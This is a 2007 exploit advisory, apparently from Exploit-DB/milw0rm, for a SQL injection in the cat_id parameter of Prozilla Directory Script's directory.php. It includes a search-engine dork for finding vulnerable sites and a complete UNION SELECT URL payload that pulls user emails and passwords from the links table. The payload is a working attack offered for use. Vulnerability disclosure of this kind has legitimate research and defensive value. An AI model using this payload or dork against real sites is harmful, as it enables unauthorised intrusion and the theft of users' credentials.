Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection

EDB-ID:

4185


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-07-14


--==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.prozilla.com/
DORK: allinurl:directory.php?ax=list


DESCRIPTION: 
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords
of users who posted URLs in the directory.


EXPLOITS:
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*


NOTE/TIP: 
Doesnt look like admin info is stored in the database, must be config.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-14]